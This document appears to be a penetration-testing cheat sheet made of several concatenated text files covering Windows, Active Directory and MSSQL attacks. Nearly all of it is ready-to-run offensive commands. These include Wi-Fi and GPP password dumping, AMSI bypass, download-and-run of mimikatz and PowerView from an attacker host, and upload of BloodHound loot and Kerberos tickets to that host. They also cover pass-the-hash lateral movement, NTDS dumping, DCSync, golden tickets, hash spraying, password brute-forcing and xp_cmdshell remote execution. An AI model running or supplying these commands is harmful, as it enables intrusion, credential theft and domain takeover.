~> powershell.exe (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh.exe wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
-- Windows 7 or PS Version 2.0
~> (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh.exe wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
`` GPP
~> findstr.exe /S /I cpassword \\VAR_DOMAIN\sysvol\VAR_DOMAIN\*.xml
~> ruby gppdecrypt.rb encrypted_output
~PS> Get-GPPPassword
`` Lateral Movement
`` Networking
`` Opening ports
-- Legacy
~> netsh.exe firewall add portopening tcp VAR_TARGET_PORT "VAR_STRING"
-- Current
~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow protocol=TCP localport=VAR_TARGET_PORT
~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow program="C:\VAR_STRING.exe" enable=yes
`` Enabling psexec
~> net.exe use \\VAR_TARGET_HOST\ipc$ VAR_USERNAME /user:VAR_PASSWORD
~> sc.exe \\VAR_TARGET_HOST config netdde start= auto
~> sc.exe \\VAR_TARGET_HOST config netddedsdm start= auto
~> sc.exe \\VAR_TARGET_HOST config clipsrv start= auto
~> sc.exe \\VAR_TARGET_HOST start netdde
~> sc.exe \\VAR_TARGET_HOST start netddedsdm
~> sc.exe \\VAR_TARGET_HOST start clipserv
`` PsExec
~> PsExec.exe -accepteula \\VAR_TARGET_HOST -u VAR_DOMAIN\VAR_USERNAME cmd.exe
~$ impacket-psexec.py VAR_DOMAIN/VAR_USERNAME@VAR_TARGET_HOST cmd -path c:\\windows\\system32
`` WMI
`` Windows
~> wmic.exe /node:computername /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"
~> wmic.exe /node:@textfile /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"
`` Linux
~$ pth-winexe -U VAR_DOMAIN/VAR_USERNAME%VAR_LM_HASH:VAR_NT_HASH //VAR_TARGET_HOST cmd.exe
~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_USERNAME@VAR_TARGET_HOST
~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_DOMAIN/Administrator@VAR_TARGET_HOST "taskkill /f /fi \"USERNAME eq Administrator\""
`` RDP
~$ xfreerpd /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST
-- Low bandwidth
~$ xfreerdp -themes -wallpaper +compression +clipboard /bpp:16 /v:VAR_TARGET_HOST /u:VAR_USERNAME /rfx /rfx-mode:video /gfx +gfx-progressive +gfx-h264 /p:'VAR_PASSWORD'
`` WinRM
`` Configure the remote machine to work with WinRM
~PS> Enable-PSRemoting -Force
`` Testing the WinRM Connection
~PS> Test-WSMan VAR_TARGET_HOST
`` Adding Trusted Host in WinRM
~> winrm set winrm/config/client @{TrustedHosts="VAR_ATTACKER_HOST"}
`` Execute commands using Powershell Invoke-Command on the target over WinRM
~PS> Invoke-Command -ComputerName VAR_TARGET_HOST -ScriptBlock {ipconfig.exe /all}
`` Interactive session
~PS> C:\> Enter-PSSession -ComputerName VAR_TARGET_HOST
~PS> C:\> Enter-PSSession -ComputerName VAR_TARGET_HOST -credential VAR_DOMAIN\VAR_USERNAME switch
`` Disable Powershell Remoting
~PS> C:\Windows\system32> Disable-PSRemoting
`` DCOM
`` DCOM applications via MMC Application Class (MMC20.Application)
~PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IPAddress"))
~PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
`` DCOM via ShellExecute
~PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"IPAddress")
~PS> $obj = [System.Activator]::CreateInstance($com)
~PS> $item = $obj.Item()
~PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
`` DCOM via ShellBrowserWindow (Windows 10)
~PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"IPAddress")
~PS> $obj = [System.Activator]::CreateInstance($com)
~PS> $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
`` Shutdown
~> net.exe rpc shutdown -I VAR_TARGET_IP -U VAR_USERNAME%VAR_PASSWORD
`` Environment Variables
- %ALLUSERSPROFILE%
- %COMPUTERNAME%
- %COMSPEC%
- %DATE%
- %HOMEDRIVE%
- %HOMEPATH%
- %HOMESHARE%
- %LOGONSEVER%
- %PATH%
- %PATHEXT%
- %RANDOM%
- %SYSTEM32%
- %SYSTEMDRIVE%
- %SYSTEMROOT%
- %TEMP%
- %TIME%
- %USERDOMAIN%
- %USERNAME%
- %USERPROFILE%
- %USERSID%
- %WINDIR%
`` Well-known SIDs (all versions of Windows):
-- Source: https://support.microsoft.com/en-au/help/243330/well-known-security-identifiers-in-windows-operating-systems
- S-1-0 - Null Authority - An identifier authority.
- S-1-0-0 - Nobody - No security principal.
- S-1-1 - World Authority - An identifier authority.
- S-1-1-0 - Everyone - A group that includes all users, even anonymous users and guests. Membership is controlled by the operating system. Note: By default, the Everyone group no longer includes anonymous users on a computer that is running Windows XP Service Pack 2 (SP2).
- S-1-2 - Local Authority - An identifier authority.
- S-1-2-0 - Local - A group that includes all users who have logged on locally.
- S-1-3 - Creator Authority - An identifier authority.
- S-1-3-0 - Creator Owner - A placeholder in an inheritable access control entry (ACE). When the ACE is inherited, the system replaces this SID with the SID for the object's creator.
- S-1-3-1 - Creator Group - A placeholder in an inheritable ACE. When the ACE is inherited, the system replaces this SID with the SID for the primary group of the object's creator. The primary group is used only by the POSIX subsystem.
- S-1-3-4 - Owner Rights - A group that represents the current owner of the object. When an ACE that carries this SID is applied to an object, the system ignores the implicit READ_CONTROL and WRITE_DAC permissions for the object owner.
- S-1-4 - Non-unique Authority - An identifier authority.
- S-1-5 - NT Authority - An identifier authority.
- S-1-5-1 - Dialup - A group that includes all users who have logged on through a dial-up connection. Membership is controlled by the operating system.
- S-1-5-2 - Network - A group that includes all users that have logged on through a network connection. Membership is controlled by the operating system.
- S-1-5-3 - Batch - A group that includes all users that have logged on through a batch queue facility. Membership is controlled by the operating system.
- S-1-5-4 - Interactive - A group that includes all users that have logged on interactively. Membership is controlled by the operating system.
- S-1-5-5-X-Y - Logon Session - A logon session. The X and Y values for these SIDs are different for each session.
- S-1-5-6 - Service - A group that includes all security principals that have logged on as a service. Membership is controlled by the operating system.
- S-1-5-7 - Anonymous - A group that includes all users that have logged on anonymously. Membership is controlled by the operating system.
- S-1-5-9 - Enterprise Domain Controllers - A group that includes all domain controllers in a forest that uses an Active Directory directory service. Membership is controlled by the operating system.
- S-1-5-10 - Principal Self - A placeholder in an inheritable ACE on an account object or group object in Active Directory. When the ACE is inherited, the system replaces this SID with the SID for the security principal who holds the account.
- S-1-5-11 - Authenticated Users - A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the operating system.
- S-1-5-12 - Restricted Code - This SID is reserved for future use.
- S-1-5-13 - Terminal Server Users - A group that includes all users that have logged on to a Terminal Services server. Membership is controlled by the operating system.
- S-1-5-14 - Remote Interactive Logon - A group that includes all users who have logged on through a terminal services logon.
- S-1-5-17 - This Organization - An account that is used by the default Internet Information Services (IIS) user.
- S-1-5-18 - Local System - A service account that is used by the operating system.
- S-1-5-19 - NT Authority - Local Service
- S-1-5-20 - NT Authority - Network Service
- S-1-5-21domain-500 - Administrator - A user account for the system administrator. By default, it is the only user account that is given full control over the system.
- S-1-5-21domain-501 - Guest - A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled.
- S-1-5-21domain-502 - KRBTGT - A service account that is used by the Key Distribution Center (KDC) service.
- S-1-5-21domain-512 - Domain Admins - A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created by any member of the group.
- S-1-5-21domain-513 - Domain Users - A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group by default.
- S-1-5-21domain-514 - Domain Guests - A global group that, by default, has only one member, the domain's built-in Guest account.
- S-1-5-21domain-515 - Domain Computers - A global group that includes all clients and servers that have joined the domain.
- S-1-5-21domain-516 - Domain Controllers - A global group that includes all domain controllers in the domain. New domain controllers are added to this group by default.
- S-1-5-21domain-517 - Cert Publishers - A global group that includes all computers that are running an enterprise certification authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory.
- S-1-5-21root domain-518 - Schema Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain.
- S-1-5-21root domain-519 - Enterprise Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain.
- S-1-5-21domain-520 - Group Policy Creator Owners - A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator.
- S-1-5-21domain-526 - Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
- S-1-5-21domain-527 - Enterprise Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
- S-1-5-21domain-553 - RAS and IAS Servers - A domain local group. By default, this group has no members. Servers in this group have Read Account Restrictions and Read Logon Information access to User objects in the Active Directory domain local group.
- S-1-5-32-544 - Administrators - A built-in group. After the initial installation of the operating system, the only member of the group is the Administrator account. When a computer joins a domain, the Domain Admins group is added to the Administrators group. When a server becomes a domain controller, the Enterprise Admins group also is added to the Administrators group.
- S-1-5-32-545 - Users - A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer.
- S-1-5-32-546 - Guests - A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer's built-in Guest account.
- S-1-5-32-547 - Power Users - A built-in group. By default, the group has no members. Power users can create local users and groups; modify and delete accounts that they have created; and remove users from the Power Users, Users, and Guests groups. Power users also can install programs; create, manage, and delete local printers; and create and delete file shares.
- S-1-5-32-548 - Account Operators - A built-in group that exists only on domain controllers. By default, the group has no members. By default, Account Operators have permission to create, modify, and delete accounts for users, groups, and computers in all containers and organizational units of Active Directory except the Builtin container and the Domain Controllers OU. Account Operators do not have permission to modify the Administrators and Domain Admins groups, nor do they have permission to modify the accounts for members of those groups.
- S-1-5-32-549 - Server Operators - A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.
- S-1-5-32-550 - Print Operators - A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues.
- S-1-5-32-551 - Backup Operators - A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down.
- S-1-5-32-552 - Replicators - A built-in group that is used by the File Replication service on domain controllers. By default, the group has no members. Do not add users to this group.
- S-1-5-32-582 - Storage Replica Administrators - A built-in group that grants complete and unrestricted access to all features of Storage Replica.
- S-1-5-64-10 - NTLM Authentication - An SID that is used when the NTLM authentication package authenticated the client.
- S-1-5-64-14 - SChannel Authentication - An SID that is used when the SChannel authentication package authenticated the client.
- S-1-5-64-21 - Digest Authentication - An SID that is used when the Digest authentication package authenticated the client.
- S-1-5-80 - NT Service - An NT Service account prefix.
`` Windows Service ACLs
-- sc.exe sdshow VAR_STRING
- The first letter after brackets means: allow (A) or deny (D).
- S: — System Access Control List (SACL)
- D: — Discretionary ACL (DACL)
- CC — SERVICE_QUERY_CONFIG (request service settings)
- LC — SERVICE_QUERY_STATUS (service status polling)
- SW — SERVICE_ENUMERATE_DEPENDENTS
- LO — SERVICE_INTERROGATE
- CR — SERVICE_USER_DEFINED_CONTROL
- RC — READ_CONTROL
- RP — SERVICE_START
- WP — SERVICE_STOP
- DT — SERVICE_PAUSE_CONTINUE
- AU Authenticated Users
- AO Account operators
- RU Alias to allow previous Windows 2000
- AN Anonymous logon
- AU Authenticated users
- BA Built-in administrators
- BG Built-in guests
- BO Backup operators
- BU Built-in users
- CA Certificate server administrators
- CG Creator group
- CO Creator owner
- DA Domain administrators
- DC Domain computers
- DD Domain controllers
- DG Domain guests
- DU Domain users
- EA Enterprise administrators
- ED Enterprise domain controllers
- WD Everyone
- PA Group Policy administrators
- IU Interactively logged-on user
- LA Local administrator
- LG Local guest
- LS Local service account
- SY Local system
- NU Network logon user
- NO Network configuration operators
- NS Network service account
- PO Printer operators
- PS Personal self
- PU Power users
- RS RAS servers group
- RD Terminal server users
- RE Replicator
- RC Restricted code
- SA Schema administrators
- SO Server operators
- SU Service logon user
`` Research
`` System-wide proxy
`` Enable
~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d 127.0.0.1:8080 /f
~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
`` Disable
~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
================================================
FILE: Target.Host.Service.AD.txt
================================================
`` Helpers
`` Powerview
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/powerview.ps1')
`` Toolkit
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/mimikatz.ps1')
~> mkdir C:\tools & cd C:\tools
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Grouper2.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Incognito.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/minidump.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Rubeus.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/strings.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/PsExec64.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/accesschk64.exe
~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/sdelete64.exe
`` RAST
~PS> curl.exe -O "http://VAR_ATTACKER_HOST:8001/Microsoft.ActiveDirectory.Management.dll"
~PS> $Env:ADPS_LoadDefaultDrive = 0
~PS> Import-Module .\Microsoft.ActiveDirectory.Management.dll
`` Powershell LDAP
-- Initializing LDAP connection with domain connected machine
~PS> $ds = [adsisearcher]""
-- Otherwise
~PS> $dn = New-Object System.DirectoryServices.DirectoryEntry("LDAP://VAR_DOMAIN_HOST:389", VAR_USERNAME, VAR_PASSWORD)
~PS> $ds = New-Object System.DirectoryServices.DirectorySearcher($dn)
`` Information Gathering
`` Objects
`` Computers
~> net.exe view /domain
~PS> $ds.Filter = "((objectCategory=computer))"
~PS> $computers = $ds.FindAll()
~PS> foreach ($comp in $computers) {
~PS> $compHostname = $comp.properties.dnshostname
~PS> if ($compHostname) {
~PS> $compHostname | Out-File -Append hosts.txt
~PS> }
~PS> }
-- Powerview
~PS> Get-DomainComputer
-- Powerview: all hosts with DNS resolution
~PS> Get-ForestGlobalCatalog | %{ Get-DomainComputer -Properties dnshostname -Domain $_.Domain | %{ if ($_.dnshostname) { Get-IPAddress $_.dnshostname } } }
`` Printers
~PS> $ds.Filter = "((objectCategory=printqueue))"
~PS> $printers = $ds.FindAll()
-- A simple output for targeting domain attached printers
~PS> foreach ($pri in $printers) { $pri.properties.printername + $pri.properties.servername + $pri.properties.printlanguage + ' '}
`` Users
~> net.exe user /domain
~PS> $ds.Filter = "((objectCategory=user))"
~PS> $users = $ds.FindAll()
-- Slow but detailed and very likely to be noisy
~> wmic.exe useraccount list /format:list
-- Powerview
~PS> Get-DomainUser
~PS> Invoke-UserHunter -Stealth -GroupName "Remote Desktop Users"
-- Impacket
~$ proxychains impacket-GetADUsers.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME
`` Users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH)
~$ impacket-GetNPUsers -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD
`` By object name
~PS> $ds.Filter = "((name=*admin*))"
~PS> $ds.Findall()
`` Groups
~> net.exe group /domain
~PS> $ds.Filter = "((objectCategory=group))"
~PS> $groups = $ds.FindAll()
-- Members of a specific group
~PS> $ds.Filter = "(&(objectCategory=user)(memberOf=CN=Domain Admins,CN=Users,DC=VAR_DOMAIN,DC=VAR_DOMAIN))"
~PS> $ds.Findall()
-- Powerview
~PS> Get-DomainGroup
~PS> Get-DomainGroup -MemberIdentity VAR_USERNAME
`` Permissions
~PS> Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}
~PS> Get-NetGPO -Identity VAR_USERNAME -Domain VAR_DOMAIN -DomainController VAR_DOMAIN_HOST | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}
`` Services
`` SPNs
~> setspn.exe -T * -Q */*
-- Using Impacket
~$ proxychains impacket-GetUserSPNs.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME
`` RDP
-- Powerview
~PS> Get-DomainGPOUserLocalGroupMapping -Identity VAR_USERNAME -Domain VAR_TARGET_DOMAIN -LocalGroup RDP
`` Policies
`` Powerview
-- Find GPO location
~PS> Find-GPOLocation -Domain VAR_TARGET_DOMAIN
-- List ACLs for GPO
~PS> Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
`` Grouper2
~> C:\tools\Grouper2.exe -i 10 -g
`` Domains
`` Enumeration
~PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
~PS> [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
`` Controllers
~> nltest.exe /dclist:VAR_DOMAIN
`` Trusts
~> nltest.exe /trusted_domains
~PS> ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
`` Delegation
-- Powerview
~PS> Get-DomainUser -TrustedToAuth
~PS> Get-DomainComputer -TrustedToAuth
-- Powerview: find computers accessed by admin users
~PS> Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
`` Automated analysis
`` Bloodhound
~PS> mkdir C:\loot
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/SharpHound.ps1')
~PS> Invoke-Bloodhound -CollectionMethod All -Domain VAR_TARGET_DOMAIN -OutputDirectory C:\loot -ZipFileName blood.zip
~PS> IEX(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/blood.zip', 'C:\loot\blood.zip')
-- Using specific credentials
~PS> Invoke-Bloodhound -CollectionMethod All -LDAPUser VAR_USERNAME -LDAPPass VAR_PASSWORD
`` Other noteworthy scripts
- FindTrustedAndSPNAccounts.vbs
- FindAllSvc.ps1
- ACLight2.ps1
- Get-ExploitableSystems.psm1
`` Lateral Movement
`` PTH and mimikatz
~PS> mimikatz.exe # sekurlsa::pth /user:VAR_USERNAME /domain:VAR_TARGET_DOMAIN /ntlm:VAR_NT_HASH /run:"mstsc.exe /restrictedadmin"
`` Native
~PS> Enter-PSSession -ComputerName VAR_TARGET_HOST
`` Push/pop location
~PS> Push-Location \\VAR_TARGET_HOST\sysvol
~PS> gci * -Include *.xml,*.ini,*.txt,*.cfg,*.bat,*.ps1,*.psm,*.psd,*.vbs,*.cmd -Recurse -EA SilentlyContinue | Select-String password
~PS> Pop-Location
`` Runas
~> runas.exe /netonly /user:VAR_DOMAIN\VAR_USERNAME cmd.exe
`` Find machines the current user has admin access to
-- Powerview
~PS> Find-LocalAdminAccess
`` WMI
~$ proxychains impacket-wmiexec.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_DOMAIN/VAR_USERNAME@VAR_TARGET_HOST
`` PsExec
~$ impacket-psexec -hashes VAR_LM_HASH:VAR_NT_HASH VAR_USERNAME@VAR_TARGET_HOST
~$ impacket-psexec VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD@VAR_TARGET_HOST
`` WinRM
~> winrs.exe -r:VAR_TARGET_HOST cmd.exe
~$ evil-winrm --user VAR_USERNAME --hash VAR_NT_HASH --ip VAR_TARGET_HOST
~$ evil-winrm --user VAR_USERNAME --password VAR_PASSWORD --ip VAR_TARGET_HOST
`` NTLM Relay
~$ proxychains impacket-ntlmrelayx --no-http-server -smb2support -t VAR_TARGET_HOST -c 'dir'
`` Dump credentials - NTDS
~> powershell.exe "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\loot\ntds' q q"
~$ impacket-secretsdump -system ntds/registry/SYSTEM -security ntds/registry/SECURITY -ntds ntds/Active\ Directory/ntds.dit local
~$ impacket-secretsdump -just-dc-ntlm VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD@VAR_TARGET_HOST
`` Tickets
`` Request
-- Powerview
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/powerview.ps1')
~PS> Add-Type -AssemblyName System.IdentityModel
~PS> Get-ForestGlobalCatalog | %{ setspn.exe -T -Domain $_.Domain -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } }
`` Cracking
-- Export
~PS> mimikatz.exe # kerberos::list /export
-- Upload
~> powershell.exe -exec bypass "(New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/sql01.kirbi', 'C:\loot\WEB01$@MSSQLSvc~sql01~1433.kirbi')"
-- Using https://github.com/nidem/kerberoast
~$ ~/lib/kerberoast/tgsrepcrack.py VAR_WORDLIST sql01.kirbi
-- Using John The Ripper
~$ /usr/share/john/krb2john.py
`` From the attacking box
-- Convert and use
~$ ticket_converter.py ticket.kirbi ticket.ccache
~$ kdestroy
~$ cp ticket.ccache ~/ticket.ccache
~$ export KRB5CCNAME=/home/user/ticket.ccache
~$ klist
-- Request ticket for a service
~$ kvno MSSQLSvc/VAR_TARGET_DOMAIN:1433
`` Golden (using KRBTGT NTLM password hash)
~PS> Get-DomainSID -Domain VAR_DOMAIN
~PS> mimikatz.exe # lsadump::dcsync /domain:VAR_DOMAIN /user:krbtgt
~PS> mimikatz.exe # kerberos::golden /user:whatever /domain:VAR_DOMAIN /sid:S-1-5-21-xxx /krbtgt:VAR_NT_HASH /sids:S-1-5-21-xxx-519 /ptt
~> PsExec64.exe \\rdc02 cmd
`` Changing permissions
-- Powerview: add all permissions to VAR_NAME
~PS> Add-DomainObjectAcl -TargetIdentity 'VAR_NAME' -Rights All -PrincipalIdentity VAR_USERNAME
-- Powerview: add VAR_USERNAME to a group VAR_NAME
~PS> Add-DomainGroupMember -Identity 'VAR_NAME' -Members 'VAR_USERNAME'
~PS> Get-DomainGroupMember 'VAR_NAME'
-- Powerview: give replication rights
~PS> Add-ObjectACL -PrincipalIdentity VAR_USERNAME -Rights DCSync
`` LAPS
-- Is LAPS enabled?
~> reg.exe query "HKLM\SOFTWARE\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
~PS> IEX(New-Object Net.Webclient).DownloadString('http://VAR_ATTACKER_HOST:8001/LAPSToolkit.ps1')
~PS> Get-LAPSComputers
~PS> Find-LAPSDelegatedGroups
`` Password in Group Policy Preferences
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Get-GPPPassword.ps1'); Get-GPPPassword
`` Permissions
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Invoke-ACLPwn.ps1')
`` Tokens
`` Manipulation
~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/Invoke-TokenManipulation.ps1')
`` Impersonation
~PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
~PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity 'VAR_USERNAME'
~PS> $context = $idToImpersonate.Impersonate()
~PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
-- Using Incognito
C:\tools\Incognito.exe exe VAR_DOMAIN\VAR_USERNAME cmd.exe
`` Spraying
`` WMI
~PS> $ds = [adsisearcher]"((objectCategory=computer))"
~PS> $comps = $ds.FindAll()
~PS> IEX(New-Object System.Net.WebClient).DownloadString("http://VAR_ATTACKER_HOST:8001/Invoke-WMIExec.ps1")
~PS> foreach ($comp in $comps) {
~PS> $compname = $comp.properties.dnshostname
~PS> if ($compname) { Invoke-WMIExec -Target $compname -Username VAR_USERNAME -Hash VAR_NT_HASH -Command "whoami" -Verbose }
~PS> }
`` crackmapexec
~$ crackmapexec VAR_TARGET_RANGE -x whoami --timeout 5 -d VAR_TARGET_DOMAIN -u VAR_USERNAME -H VAR_LM_HASH:VAR_NT_HASH
~$ crackmapexec smb VAR_TARGET_RANGE -u VAR_USERNAME -H VAR_LM_HASH:VAR_NT_HASH --local-auth
`` Impacket
for ip in $(seq 1 254); do
impacket-smbexec.py -hashes VAR_LM_HASH:VAR_NT_HASH $VAR_TARGET_DOMAIN/VAR_USERNAME@VAR_TARGET_NETWORK$ip
done
================================================
FILE: Target.Host.Service.AMQP.txt
================================================
`` RabbitMQ
~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST
================================================
FILE: Target.Host.Service.DB.MSSQL.txt
================================================
`` Scanning
~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables
`` Password Bruteforcing
~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql
`` TDS Versions
- 7.0
- SQL Server 7.0
- 7.1
- SQL Server 2000
- 7.1 Revision 1
- SQL Server 2000 SP1
- 7.2
- SQL Server 2005
- 7.3.A
- SQL Server 2008
- 7.3.B
- SQL Server 2008 R2
- 7.4
- SQL Server 2012
- SQL Server 2014
- SQL Server 2016
- SQL Server 2017
- SQL Server 2019
`` Remote console
~$ vim ~/.sqshrc
~$ sqsh -S mssql1
`` Capturing NTLM
> EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test";
`` Change sa password
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS /m sqlcmd
~> sqlcmd
> ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master]
> GO
> USE [master]
> GO
> ALTER LOGIN [sa] WITH CHECK_POLICY = OFF;
> GO
> ALTER LOGIN [sa] WITH PASSWORD=N'sa';
> GO
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS
`` Linked servers
`` List
> EXEC sp_linkedservers;
`` Execute on linked server
> SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version')
`` Remote execution
> EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST
`` With metasploit
> use auxiliary/admin/mssql/mssql_sql
> set USERNAME VAR_USERNAME
> set PASSWORD VAR_PASSWORD
> set DOMAIN VAR_DOMAIN
> set USE_WINDOWS_AUTHENT yes
> set RHOSTS VAR_TARGET_HOST
> set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'"
> run
`` xp_cmdshell
`` The basic approach
> exec sp_configure "show advanced options", 1
> reconfigure
> exec sp_configure "xp_cmdshell", 1
> reconfigure
> xp_cmdshell "whoami"
`` Download and execute PowerShell
> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");"
`` wget.vbs
xp_cmdshell 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs'
go
xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs'
go
